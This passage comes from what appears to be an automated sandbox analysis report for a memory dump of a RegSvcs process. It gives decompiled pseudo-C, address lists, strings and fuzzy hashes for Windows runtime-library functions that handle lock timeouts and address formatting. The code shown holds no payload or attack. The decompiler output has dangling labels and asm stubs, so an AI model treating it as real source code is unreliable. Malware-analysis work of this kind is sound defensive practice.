                                                0x008c23ba
                                                0x008c23ba
                                                0x008c23bc
                                                0x008c23bf
                                                0x00000000
                                                0x00000000
                                                0x008b9153
                                                0x008b9158
                                                0x008b915a
                                                0x008b915e
                                                0x008b9160
                                                0x00000000
                                                0x008b9166
                                                0x008b9166
                                                0x008b9171
                                                0x008b9176
                                                0x008b9176
                                                0x00000000
                                                0x008b9160
                                                0x008c23c6
                                                0x008c23ce
                                                0x008c23d7
                                                0x008c23d7
                                                0x008c23ad
                                                0x008c2390
                                                0x008c2373
                                                0x008c233f
                                                0x008c233f
                                                0x00000000
                                                0x008c233f
                                                0x008c2291
                                                0x008c2291
                                                0x008c2293
                                                0x008c2295
                                                0x008c229a
                                                0x008c22a1
                                                0x008c22a3
                                                0x008c22a7
                                                0x008c22a9
                                                0x00000000
                                                0x00000000
                                                0x008c22ab
                                                0x008c22ad
                                                0x008c22af
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x008c22af
                                                0x008c22b1
                                                0x008c22b4
                                                0x008c22b4
                                                0x008c22b6
                                                0x008853be
                                                0x008853be
                                                0x008853be
                                                0x008853c0
                                                0x00000000
                                                0x00000000
                                                0x008853cb
                                                0x008853ce
                                                0x008853d0
                                                0x008853d4
                                                0x008853d6
                                                0x00000000
                                                0x008853d8
                                                0x008853e3
                                                0x008853ea
                                                0x008853ea
                                                0x00000000
                                                0x008853d6
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x008c22b6
                                                0x00000000
                                                0x008c228f
                                                0x008c2349
                                                0x008c234d
                                                0x008c2251
                                                0x008c2251
                                                0x00000000
                                                0x008c2251
                                                0x008c21a4
                                                0x008c21a4
                                                0x008c21a6
                                                0x008c21a8
                                                0x008c21ac
                                                0x008c21b6
                                                0x008c21b8
                                                0x008c21bc
                                                0x008c21be
                                                0x00000000
                                                0x00000000
                                                0x008c21c0
                                                0x008c21c2
                                                0x008c21c4
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x008c21c4
                                                0x008c21c6
                                                0x008c21c6
                                                0x008c21c8
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x008c21c8
                                                0x008c21a2
                                                0x00000000
                                                0x008c2183
                                                0x008a057b
                                                0x008a057d
                                                0x008a0581
                                                0x008a0583
                                                0x008c2178
                                                0x00000000
                                                0x008a0589
                                                0x008a058f
                                                0x008a058f
                                                0x008a0583
                                                0x00000000

                                                APIs
                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 008C2206
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1056971464.0000000000850000.00000040.00001000.00020000.00000000.sdmp, Offset: 00840000, based on PE: true
                                                • Associated: 00000008.00000002.1056971464.0000000000840000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.1056971464.0000000000930000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.1056971464.0000000000940000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.1056971464.0000000000944000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.1056971464.0000000000947000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.1056971464.0000000000950000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.1056971464.00000000009B0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_840000_RegSvcs.jbxd
                                                Similarity
                                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                • API String ID: 885266447-4236105082
                                                • Opcode ID: 78c28a735a068ff64d625ba304aee8b126f87318016234abd6c2291446612c58
                                                • Instruction ID: 9904a52d0e11ce428d9b793c28d47eb6759510b5c8d57c211acc56f2d56a4574
                                                • Opcode Fuzzy Hash: 78c28a735a068ff64d625ba304aee8b126f87318016234abd6c2291446612c58
                                                • Instruction Fuzzy Hash: CB512531B002016BEB15DA18CC82FA673A9FF95720F25822DFD55DB3C6DA75EC418B91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 008A14C0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 91COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 64%
                                                			E008A14C0(void* __ecx, void* __edx, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16, intOrPtr* _a20) {
				signed int _v8;
				char _v10;
				char _v140;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t24;
				void* _t26;
				signed int _t29;
				signed int _t34;
				signed int _t40;
				intOrPtr _t45;
				void* _t51;
				intOrPtr* _t52;
				void* _t54;
				signed int _t57;
				void* _t58;

				_t51 = __edx;
				_t24 =  *0x942088; // 0x77f10225
				_v8 = _t24 ^ _t57;
				_t45 = _a16;
				_t53 = _a4;
				_t52 = _a20;
				if(_a4 == 0 || _t52 == 0) {
					L10:
					_t26 = 0xc000000d;
				} else {
					if(_t45 == 0) {
						if( *_t52 == _t45) {
							goto L3;
						} else {
							goto L10;
						}
					} else {
						L3:
						_t28 =  &_v140;
						if(_a12 != 0) {
							_push("[");
							_push(0x41);
							_push( &_v140);
							_t29 = E00897707();
							_t58 = _t58 + 0xc;
							_t28 = _t57 + _t29 * 2 - 0x88;
						}
						_t54 = E008A13CB(_t53, _t28);
						if(_a8 != 0) {
							_t34 = E00897707(_t54,  &_v10 - _t54 >> 1, L"%%%u", _a8);
							_t58 = _t58 + 0x10;
							_t54 = _t54 + _t34 * 2;
						}
						if(_a12 != 0) {
							_t40 = E00897707(_t54,  &_v10 - _t54 >> 1, L"]:%u", _a12 & 0x0000ffff);
							_t58 = _t58 + 0x10;
							_t54 = _t54 + _t40 * 2;
						}
						_t53 = (_t54 -  &_v140 >> 1) + 1;
						 *_t52 = _t53;
						if( *_t52 < _t53) {
							goto L10;
						} else {
							E00862340(_t45,  &_v140, _t53 + _t53);
							_t26 = 0;
						}
					}
				}
				return E0086E1B4(_t26, _t45, _v8 ^ _t57, _t51, _t52, _t53);
			}




















                                                0x008a14c0
                                                0x008a14cb
                                                0x008a14d2
                                                0x008a14d6
                                                0x008a14da
                                                0x008a14de
                                                0x008a14e3
                                                0x008a157a
                                                0x008a157a
                                                0x008a14f1
                                                0x008a14f3
                                                0x008cea0f
                                                0x00000000
                                                0x008cea15
                                                0x00000000
                                                0x008cea15
                                                0x008a14f9
                                                0x008a14f9
                                                0x008a14fe
                                                0x008a1504
                                                0x008cea1a
                                                0x008cea1f
                                                0x008cea21
                                                0x008cea22
                                                0x008cea27
                                                0x008cea2a
                                                0x008cea2a
                                                0x008a1515
                                                0x008a1517
                                                0x008a156d
                                                0x008a1572
                                                0x008a1575
                                                0x008a1575
                                                0x008a151e
                                                0x008cea50
                                                0x008cea55
                                                0x008cea58
                                                0x008cea58
                                                0x008a152e
                                                0x008a1531
                                                0x008a1533
                                                0x00000000
                                                0x008a1535
                                                0x008a1541
                                                0x008a1549
                                                0x008a1549
                                                0x008a1533
                                                0x008a14f3
                                                0x008a1559

                                                APIs
                                                • ___swprintf_l.LIBCMT ref: 008CEA22
                                                  • Part of subcall function 008A13CB: ___swprintf_l.LIBCMT ref: 008A146B
                                                  • Part of subcall function 008A13CB: ___swprintf_l.LIBCMT ref: 008A1490
                                                • ___swprintf_l.LIBCMT ref: 008A156D
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1056971464.0000000000850000.00000040.00001000.00020000.00000000.sdmp, Offset: 00840000, based on PE: true
                                                • Associated: 00000008.00000002.1056971464.0000000000840000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.1056971464.0000000000930000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.1056971464.0000000000940000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.1056971464.0000000000944000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.1056971464.0000000000947000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.1056971464.0000000000950000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.1056971464.00000000009B0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_840000_RegSvcs.jbxd
                                                Similarity
                                                • API ID: ___swprintf_l
                                                • String ID: %%%u$]:%u
                                                • API String ID: 48624451-3050659472
                                                • Opcode ID: cc92d8ec2328f0aa864413295444bc83bc15c5e9656dca28e2289561b514dafc
                                                • Instruction ID: e644364c94771da54c6eac93dd1c5f7a26548947b63f74372b4729cd20dfdb2a
                                                • Opcode Fuzzy Hash: cc92d8ec2328f0aa864413295444bc83bc15c5e9656dca28e2289561b514dafc
                                                • Instruction Fuzzy Hash: 1D21C172D00229ABDF20EE58CC45AEA73BCFB91714F494465FC46D3640DB74EA588BE1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 008853A5 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 185COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 45%
                                                			E008853A5(signed int _a4, char _a8) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t32;
				signed int _t37;
				signed int _t40;
				signed int _t42;
				void* _t45;
				intOrPtr _t46;
				void* _t48;
				signed int _t49;
				void* _t51;
				signed int _t57;
				signed int _t64;
				signed int _t71;
				void* _t74;
				intOrPtr _t78;
				signed int* _t79;
				void* _t85;
				signed int _t86;
				signed int _t92;
				void* _t104;
				void* _t105;

				_t64 = _a4;
				_t32 =  *(_t64 + 0x28);
				_t71 = _t64 + 0x28;
				_push(_t92);
				if(_t32 < 0) {
					_t78 =  *[fs:0x18];
					__eflags =  *((intOrPtr*)(_t64 + 0x2c)) -  *((intOrPtr*)(_t78 + 0x24));
					if( *((intOrPtr*)(_t64 + 0x2c)) !=  *((intOrPtr*)(_t78 + 0x24))) {
						goto L3;
					} else {
						__eflags = _t32 | 0xffffffff;
						asm("lock xadd [ecx], eax");
						return 1;
					}
				} else {
					L3:
					_push(_t86);
					while(1) {
						L4:
						__eflags = _t32;
						if(_t32 == 0) {
							break;
						}
						__eflags = _a8;
						if(_a8 == 0) {
							__eflags = 0;
							return 0;
						} else {
							 *((intOrPtr*)( *((intOrPtr*)(_t64 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t64 + 0x34)) + 0x14)) + 1;
							_t79 = _t64 + 0x24;
							_t71 = 1;
							asm("lock xadd [eax], ecx");
							_t32 =  *(_t64 + 0x28);
							_a4 = _t32;
							__eflags = _t32;
							if(_t32 != 0) {
								L19:
								_t86 = 0;
								__eflags = 0;
								while(1) {
									_t81 =  *(_t64 + 0x30) & 0x00000001;
									asm("sbb esi, esi");
									_t92 =  !( ~( *(_t64 + 0x30) & 1)) & 0x009401c0;
									_push(_t92);
									_push(0);
									_t37 = E0085F8CC( *((intOrPtr*)(_t64 + 0x20)));
									__eflags = _t37 - 0x102;
									if(_t37 != 0x102) {
										break;
									}
									_t71 =  *(_t92 + 4);
									_t85 =  *_t92;
									_t51 = E008A4FC0(_t85, _t71, 0xff676980, 0xffffffff);
									_push(_t85);
									_push(_t51);
									E008B3F92(0x65, 0, "RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)\n", _t86);
									E008B3F92(0x65, 0, "RTL: Resource at %p\n", _t64);
									_t86 = _t86 + 1;
									_t105 = _t104 + 0x28;
									__eflags = _t86 - 2;
									if(__eflags > 0) {
										E008E217A(_t71, __eflags, _t64);
									}
									_push("RTL: Re-Waiting\n");
									_push(0);
									_push(0x65);
									E008B3F92();
									_t104 = _t105 + 0xc;
								}
								__eflags = _t37;
								if(__eflags < 0) {
									_push(_t37);
									E008A3915(_t64, _t71, _t81, _t86, _t92, __eflags);
									asm("int3");
									_t40 =  *_t71;
									 *_t71 = 0;
									__eflags = _t40;
									if(_t40 == 0) {
										L1:
										_t42 = E00885384(_t92 + 0x24);
										if(_t42 != 0) {
											goto L31;
										} else {
											goto L2;
										}
									} else {
										_t83 =  *((intOrPtr*)(_t92 + 0x18));
										_push( &_a4);
										_push(_t40);
										_t49 = E0085F970( *((intOrPtr*)(_t92 + 0x18)));
										__eflags = _t49;
										if(__eflags >= 0) {
											goto L1;
										} else {
											_push(_t49);
											E008A3915(_t64,  &_a4, _t83, _t86, _t92, __eflags);
											L31:
											_t82 =  *((intOrPtr*)(_t92 + 0x20));
											_push( &_a4);
											_push(1);
											_t42 = E0085F970( *((intOrPtr*)(_t92 + 0x20)));
											__eflags = _t42;
											if(__eflags >= 0) {
												L2:
												return _t42;
											} else {
												_push(_t42);
												E008A3915(_t64,  &_a4, _t82, _t86, _t92, __eflags);
												_t73 =  *((intOrPtr*)(_t92 + 0x20));
												_push( &_a4);
												_push(1);
												_t42 = E0085F970( *((intOrPtr*)(_t92 + 0x20)));
												__eflags = _t42;
												if(__eflags >= 0) {
													goto L2;
												} else {
													_push(_t42);
													_t45 = E008A3915(_t64, _t73, _t82, _t86, _t92, __eflags);
													asm("int3");
													while(1) {
														_t74 = _t45;
														__eflags = _t45 - 1;
														if(_t45 != 1) {
															break;
														}
														_t86 = _t86 | 0xffffffff;
														_t45 = _t74;
														asm("lock cmpxchg [ebx], edi");
														__eflags = _t45 - _t74;
														if(_t45 != _t74) {
															continue;
														} else {
															_t46 =  *[fs:0x18];
															 *((intOrPtr*)(_t92 + 0x2c)) =  *((intOrPtr*)(_t46 + 0x24));
															return _t46;
														}
														goto L38;
													}
													E00885329(_t74, _t92);
													_push(1);
													_t48 = E008853A5(_t92);
													return _t48;
												}
											}
										}
									}
								} else {
									_t32 =  *(_t64 + 0x28);
									continue;
								}
							} else {
								_t71 =  *_t79;
								__eflags = _t71;
								if(__eflags > 0) {
									while(1) {
										_t57 = _t71;
										asm("lock cmpxchg [edi], esi");
										__eflags = _t57 - _t71;
										if(_t57 == _t71) {
											break;
										}
										_t71 = _t57;
										__eflags = _t57;
										if(_t57 > 0) {
											continue;
										}
										break;
									}
									_t32 = _a4;
									__eflags = _t71;
								}
								if(__eflags != 0) {
									continue;
								} else {
									goto L19;
								}
							}
						}
						goto L38;
					}
					_t71 = _t71 | 0xffffffff;
					_t32 = 0;
					asm("lock cmpxchg [edx], ecx");
					__eflags = 0;
					if(0 != 0) {
						goto L4;
					} else {
						 *((intOrPtr*)(_t64 + 0x2c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
						return 1;
					}
				}
				L38:
			}


























                                                0x008853ab
                                                0x008853ae
                                                0x008853b1
                                                0x008853b4
                                                0x008853b7
                                                0x008a05b6
                                                0x008a05c0
                                                0x008a05c3
                                                0x00000000
                                                0x008a05c9
                                                0x008a05c9
                                                0x008a05cc
                                                0x008a05d5
                                                0x008a05d5
                                                0x008853bd
                                                0x008853bd
                                                0x008853bd
                                                0x008853be
                                                0x008853be
                                                0x008853be
                                                0x008853c0
                                                0x00000000
                                                0x00000000
                                                0x008c2269
                                                0x008c226d
                                                0x008c2349
                                                0x008c234d
                                                0x008c2273
                                                0x008c2276
                                                0x008c2279
                                                0x008c227e
                                                0x008c2283
                                                0x008c2287
                                                0x008c228a
                                                0x008c228d
                                                0x008c228f
                                                0x008c22bc
                                                0x008c22bc
                                                0x008c22bc
                                                0x008c22be
                                                0x008c22c4
                                                0x008c22cc
                                                0x008c22d0
                                                0x008c22d6
                                                0x008c22d7
                                                0x008c22da
                                                0x008c22df
                                                0x008c22e4
                                                0x00000000
                                                0x00000000
                                                0x008c22e6
                                                0x008c22e9
                                                0x008c22f4
                                                0x008c22f9
                                                0x008c22fa
                                                0x008c2305
                                                0x008c2314
                                                0x008c2319
                                                0x008c231a
                                                0x008c231d
                                                0x008c2320
                                                0x008c2323
                                                0x008c2323
                                                0x008c2328
                                                0x008c232d
                                                0x008c232f
                                                0x008c2331
                                                0x008c2336
                                                0x008c2336
                                                0x008c233b
                                                0x008c233d
                                                0x008c2350
                                                0x008c2351
                                                0x008c2356
                                                0x008c2359
                                                0x008c2359
                                                0x008c235b
                                                0x008c235d
                                                0x00885367
                                                0x0088536b
                                                0x00885372
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x008c2363
                                                0x008c2363
                                                0x008c2369
                                                0x008c236a
                                                0x008c236c
                                                0x008c2371
                                                0x008c2373
                                                0x00000000
                                                0x008c2379
                                                0x008c2379
                                                0x008c237a
                                                0x008c237f
                                                0x008c237f
                                                0x008c2385
                                                0x008c2386
                                                0x008c2389
                                                0x008c238e
                                                0x008c2390
                                                0x00885378
                                                0x0088537c
                                                0x008c2396
                                                0x008c2396
                                                0x008c2397
                                                0x008c239c
                                                0x008c23a2
                                                0x008c23a3
                                                0x008c23a6
                                                0x008c23ab
                                                0x008c23ad
                                                0x00000000
                                                0x008c23b3
                                                0x008c23b3
                                                0x008c23b4
                                                0x008c23b9
                                                0x008c23ba
                                                0x008c23ba
                                                0x008c23bc
                                                0x008c23bf
                                                0x00000000
                                                0x00000000
                                                0x008b9153
                                                0x008b9158
                                                0x008b915a
                                                0x008b915e
                                                0x008b9160
                                                0x00000000
                                                0x008b9166
                                                0x008b9166
                                                0x008b9171
                                                0x008b9176
                                                0x008b9176
                                                0x00000000
                                                0x008b9160
                                                0x008c23c6
                                                0x008c23cb
                                                0x008c23ce
                                                0x008c23d7
                                                0x008c23d7
                                                0x008c23ad
                                                0x008c2390
                                                0x008c2373
                                                0x008c233f
                                                0x008c233f
                                                0x00000000
                                                0x008c233f
                                                0x008c2291
                                                0x008c2291
                                                0x008c2293
                                                0x008c2295
                                                0x008c229a
                                                0x008c22a1
                                                0x008c22a3
                                                0x008c22a7
                                                0x008c22a9
                                                0x00000000
                                                0x00000000
                                                0x008c22ab
                                                0x008c22ad
                                                0x008c22af
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x008c22af
                                                0x008c22b1
                                                0x008c22b4
                                                0x008c22b4
                                                0x008c22b6
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x008c22b6
                                                0x008c228f
                                                0x00000000
                                                0x008c226d
                                                0x008853cb
                                                0x008853ce
                                                0x008853d0
                                                0x008853d4
                                                0x008853d6
                                                0x00000000
                                                0x008853d8
                                                0x008853e3
                                                0x008853ea
                                                0x008853ea
                                                0x008853d6
                                                0x00000000

                                                APIs
                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 008C22F4
                                                Strings
                                                • RTL: Re-Waiting, xrefs: 008C2328
                                                • RTL: Resource at %p, xrefs: 008C230B
                                                • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 008C22FC
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1056971464.0000000000850000.00000040.00001000.00020000.00000000.sdmp, Offset: 00840000, based on PE: true
                                                • Associated: 00000008.00000002.1056971464.0000000000840000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.1056971464.0000000000930000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.1056971464.0000000000940000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.1056971464.0000000000944000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.1056971464.0000000000947000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.1056971464.0000000000950000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.1056971464.00000000009B0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_840000_RegSvcs.jbxd
                                                Similarity
                                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                • API String ID: 885266447-871070163
                                                • Opcode ID: fff28840f930ac96fe059a34a162b8967f99c6b9fd7e3595de57cbaeb8efa4a6
                                                • Instruction ID: 728101a97bab29702f6e86f7d53fdb4a5a0b55dd0cdf341c2381c0d06fc7e549
                                                • Opcode Fuzzy Hash: fff28840f930ac96fe059a34a162b8967f99c6b9fd7e3595de57cbaeb8efa4a6
                                                • Instruction Fuzzy Hash: 085114716007016BEB11AB2CCC81FAA73A8FF56364F104229FD09DB381EA75ED4187A1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0088EC56 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 145COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 51%
                                                			E0088EC56(void* __ecx, void* __edx, intOrPtr* __edi, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v24;
				intOrPtr* _v28;
				intOrPtr _v32;
				signed int _v36;
				intOrPtr _v40;
				short _v66;
				char _v72;
				void* __esi;
				intOrPtr _t38;
				intOrPtr _t39;
				signed int _t40;
				intOrPtr _t42;
				intOrPtr _t43;
				signed int _t44;
				void* _t46;
				intOrPtr _t48;
				signed int _t49;
				intOrPtr _t50;
				intOrPtr _t53;
				signed char _t67;
				void* _t72;
				intOrPtr _t77;
				intOrPtr* _t80;
				intOrPtr _t84;
				intOrPtr* _t85;
				void* _t91;
				void* _t92;
				void* _t93;

				_t80 = __edi;
				_t75 = __edx;
				_t70 = __ecx;
				_t84 = _a4;
				if( *((intOrPtr*)(_t84 + 0x10)) == 0) {
					E0087DA92(__ecx, __edx, __eflags, _t84);
					_t38 =  *((intOrPtr*)(_t84 + 0x10));
				}
				_push(0);
				__eflags = _t38 - 0xffffffff;
				if(_t38 == 0xffffffff) {
					_t39 =  *0x94793c; // 0x0
					_push(0);
					_push(_t84);
					_t40 = E008616C0(_t39);
				} else {
					_t40 = E0085F9D4(_t38);
				}
				_pop(_t85);
				__eflags = _t40;
				if(__eflags < 0) {
					_push(_t40);
					E008A3915(_t67, _t70, _t75, _t80, _t85, __eflags);
					asm("int3");
					while(1) {
						L21:
						_t76 =  *[fs:0x18];
						_t42 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
						__eflags =  *(_t42 + 0x240) & 0x00000002;
						if(( *(_t42 + 0x240) & 0x00000002) != 0) {
							_v36 =  *(_t85 + 0x14) & 0x00ffffff;
							_v66 = 0x1722;
							_t71 =  *((intOrPtr*)(_t85 + 0xc));
							_t76 =  &_v72;
							_push( &_v72);
							_v28 = _t85;
							_v40 =  *((intOrPtr*)(_t85 + 4));
							_v32 =  *((intOrPtr*)(_t85 + 0xc));
							_push(0x10);
							_push(0x20402);
							E008601A4( *0x7ffe0382 & 0x000000ff);
						}
						while(1) {
							_t43 = _v8;
							_push(_t80);
							_push(0);
							__eflags = _t43 - 0xffffffff;
							if(_t43 == 0xffffffff) {
								_t71 =  *0x94793c; // 0x0
								_push(_t85);
								_t44 = E00861F28(_t71);
							} else {
								_t44 = E0085F8CC(_t43);
							}
							__eflags = _t44 - 0x102;
							if(_t44 != 0x102) {
								__eflags = _t44;
								if(__eflags < 0) {
									_push(_t44);
									E008A3915(_t67, _t71, _t76, _t80, _t85, __eflags);
									asm("int3");
									E008E2306(_t85);
									__eflags = _t67 & 0x00000002;
									if((_t67 & 0x00000002) != 0) {
										_t7 = _t67 + 2; // 0x4
										_t72 = _t7;
										asm("lock cmpxchg [edi], ecx");
										__eflags = _t67 - _t67;
										if(_t67 == _t67) {
											E0088EC56(_t72, _t76, _t80, _t85);
										}
									}
									return 0;
								} else {
									__eflags = _v24;
									if(_v24 != 0) {
										 *((intOrPtr*)(_v12 + 0xf84)) = 0;
									}
									return 2;
								}
								goto L36;
							}
							_t77 =  *((intOrPtr*)(_t80 + 4));
							_push(_t67);
							_t46 = E008A4FC0( *_t80, _t77, 0xff676980, 0xffffffff);
							_push(_t77);
							E008B3F92(0x65, 1, "RTL: Enter Critical Section Timeout (%I64u secs) %d\n", _t46);
							_t48 =  *_t85;
							_t92 = _t91 + 0x18;
							__eflags = _t48 - 0xffffffff;
							if(_t48 == 0xffffffff) {
								_t49 = 0;
								__eflags = 0;
							} else {
								_t49 =  *((intOrPtr*)(_t48 + 0x14));
							}
							_t71 =  *((intOrPtr*)(_t85 + 0xc));
							_push(_t49);
							_t50 = _v12;
							_t76 =  *((intOrPtr*)(_t50 + 0x24));
							_push(_t85);
							_push( *((intOrPtr*)(_t85 + 0xc)));
							_push( *((intOrPtr*)(_t50 + 0x24)));
							E008B3F92(0x65, 0, "RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu\n",  *((intOrPtr*)(_t50 + 0x20)));
							_t53 =  *_t85;
							_t93 = _t92 + 0x20;
							_t67 = _t67 + 1;
							__eflags = _t53 - 0xffffffff;
							if(_t53 != 0xffffffff) {
								_t71 =  *((intOrPtr*)(_t53 + 0x14));
								_a4 =  *((intOrPtr*)(_t53 + 0x14));
							}
							__eflags = _t67 - 2;
							if(_t67 > 2) {
								__eflags = _t85 - 0x9420c0;
								if(_t85 != 0x9420c0) {
									_t76 = _a4;
									__eflags = _a4 - _a8;
									if(__eflags == 0) {
										E008E217A(_t71, __eflags, _t85);
									}
								}
							}
							_push("RTL: Re-Waiting\n");
							_push(0);
							_push(0x65);
							_a8 = _a4;
							E008B3F92();
							_t91 = _t93 + 0xc;
							__eflags =  *0x7ffe0382;
							if( *0x7ffe0382 != 0) {
								goto L21;
							}
						}
						goto L36;
					}
				} else {
					return _t40;
				}
				L36:
			}

































                                                0x0088ec56
                                                0x0088ec56
                                                0x0088ec56
                                                0x0088ec5c
                                                0x0088ec64
                                                0x008c23e6
                                                0x008c23eb
                                                0x008c23eb
                                                0x0088ec6a
                                                0x0088ec6c
                                                0x0088ec6f
                                                0x008c23f3
                                                0x008c23f8
                                                0x008c23fa
                                                0x008c23fc
                                                0x0088ec75
                                                0x0088ec76
                                                0x0088ec76
                                                0x0088ec7b
                                                0x0088ec7c
                                                0x0088ec7e
                                                0x008c2406
                                                0x008c2407
                                                0x008c240c
                                                0x008c240d
                                                0x008c240d
                                                0x008c240d
                                                0x008c2414
                                                0x008c2417
                                                0x008c241e
                                                0x008c2435
                                                0x008c2438
                                                0x008c243c
                                                0x008c243f
                                                0x008c2442
                                                0x008c2443
                                                0x008c2446
                                                0x008c2449
                                                0x008c2453
                                                0x008c2455
                                                0x008c245b
                                                0x008c245b
                                                0x0088eb99
                                                0x0088eb99
                                                0x0088eb9c
                                                0x0088eb9d
                                                0x0088eb9f
                                                0x0088eba2
                                                0x008c2465
                                                0x008c246b
                                                0x008c246d
                                                0x0088eba8
                                                0x0088eba9
                                                0x0088eba9
                                                0x0088ebae
                                                0x0088ebb3
                                                0x0088ebb9
                                                0x0088ebbb
                                                0x008c2513
                                                0x008c2514
                                                0x008c2519
                                                0x008c251b
                                                0x0088ec2a
                                                0x0088ec2d
                                                0x0088ec33
                                                0x0088ec36
                                                0x0088ec3a
                                                0x0088ec3e
                                                0x0088ec40
                                                0x0088ec47
                                                0x0088ec47
                                                0x0088ec40
                                                0x008622c6
                                                0x0088ebc1
                                                0x0088ebc1
                                                0x0088ebc5
                                                0x0088ec9a
                                                0x0088ec9a
                                                0x0088ebd6
                                                0x0088ebd6
                                                0x00000000
                                                0x0088ebbb
                                                0x008c2477
                                                0x008c247c
                                                0x008c2486
                                                0x008c248b
                                                0x008c2496
                                                0x008c249b
                                                0x008c249d
                                                0x008c24a0
                                                0x008c24a3
                                                0x008c24aa
                                                0x008c24aa
                                                0x008c24a5
                                                0x008c24a5
                                                0x008c24a5
                                                0x008c24ac
                                                0x008c24af
                                                0x008c24b0
                                                0x008c24b3
                                                0x008c24b9
                                                0x008c24ba
                                                0x008c24bb
                                                0x008c24c6
                                                0x008c24cb
                                                0x008c24cd
                                                0x008c24d0
                                                0x008c24d1
                                                0x008c24d4
                                                0x008c24d6
                                                0x008c24d9
                                                0x008c24d9
                                                0x008c24dc
                                                0x008c24df
                                                0x008c24e1
                                                0x008c24e7
                                                0x008c24e9
                                                0x008c24ec
                                                0x008c24ef
                                                0x008c24f2
                                                0x008c24f2
                                                0x008c24ef
                                                0x008c24e7
                                                0x008c24fa
                                                0x008c24ff
                                                0x008c2501
                                                0x008c2503
                                                0x008c2506
                                                0x008c250b
                                                0x0088eb8c
                                                0x0088eb93
                                                0x00000000
                                                0x00000000
                                                0x0088eb93
                                                0x00000000
                                                0x0088eb99
                                                0x0088ec85
                                                0x0088ec85
                                                0x0088ec85
                                                0x00000000

                                                Strings
                                                • RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu, xrefs: 008C24BD
                                                • RTL: Re-Waiting, xrefs: 008C24FA
                                                • RTL: Enter Critical Section Timeout (%I64u secs) %d, xrefs: 008C248D
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1056971464.0000000000850000.00000040.00001000.00020000.00000000.sdmp, Offset: 00840000, based on PE: true
                                                • Associated: 00000008.00000002.1056971464.0000000000840000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.1056971464.0000000000930000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.1056971464.0000000000940000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.1056971464.0000000000944000.00000040.00001000.00020000.00000000.sdmpDownload File
